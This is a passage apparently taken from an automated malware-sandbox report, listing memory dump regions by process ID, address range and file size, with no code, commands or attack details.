                                                                                                                                                                                                                                                                            • memory/2496-203-0x000000001AE00000-0x000000001AE02000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                            • memory/2496-188-0x0000000000A60000-0x0000000000A61000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/2524-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2524-208-0x0000000000E10000-0x0000000000E11000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/2524-270-0x00000000059A0000-0x00000000059A1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/2524-253-0x0000000005590000-0x0000000005B96000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                            • memory/2608-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2608-371-0x00000000049D0000-0x0000000004A6D000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              628KB

                                                                                                                                                                                                                                                                            • memory/2608-374-0x0000000000400000-0x0000000002D0E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              41.1MB

                                                                                                                                                                                                                                                                            • memory/2628-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2728-231-0x000000001AFA0000-0x000000001AFA2000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                            • memory/2728-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2728-207-0x0000000000A70000-0x0000000000A8C000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                            • memory/2728-165-0x0000000000350000-0x0000000000351000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/2816-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/2876-172-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                            • memory/2876-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3028-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3040-373-0x0000000001350000-0x0000000001366000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              88KB

                                                                                                                                                                                                                                                                            • memory/3308-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3680-380-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3680-388-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                            • memory/3768-259-0x0000000077000000-0x000000007718E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                            • memory/3768-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/3768-353-0x0000000005320000-0x0000000005321000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4052-387-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4144-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4232-268-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-285-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-222-0x00000000023F0000-0x000000000242C000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              240KB

                                                                                                                                                                                                                                                                            • memory/4232-299-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-238-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4232-264-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-261-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-255-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-244-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-274-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-223-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-263-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-290-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-305-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-281-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-309-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-260-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-314-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-258-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4232-247-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4356-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4396-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4404-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4424-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4544-410-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                            • memory/4544-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4552-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4580-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4608-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4608-241-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              12KB

                                                                                                                                                                                                                                                                            • memory/4696-356-0x000001D878AA0000-0x000001D878B6F000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              828KB

                                                                                                                                                                                                                                                                            • memory/4696-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4696-354-0x000001D878A30000-0x000001D878A9F000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              444KB

                                                                                                                                                                                                                                                                            • memory/4744-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4776-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4776-415-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4840-272-0x0000000000418F76-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4840-266-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                            • memory/4840-329-0x0000000004EB0000-0x00000000054B6000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                            • memory/4860-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4864-271-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                            • memory/4864-276-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4864-307-0x0000000005900000-0x0000000005901000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4864-333-0x0000000005860000-0x0000000005D5E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              5.0MB

                                                                                                                                                                                                                                                                            • memory/4880-366-0x00000215477A3000-0x00000215477A5000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                            • memory/4880-365-0x00000215477A0000-0x00000215477A2000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                            • memory/4880-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4936-296-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/4936-291-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                            • memory/4936-341-0x0000000005840000-0x0000000005E46000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                            • memory/5008-315-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5008-350-0x0000000005510000-0x0000000005B16000-memory.dmp
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                            • memory/5148-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5156-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5216-408-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5228-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5284-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5348-554-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5360-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5392-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5480-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5648-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5656-549-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5724-497-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5860-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/5872-506-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                            • memory/6088-553-0x0000000000000000-mapping.dmp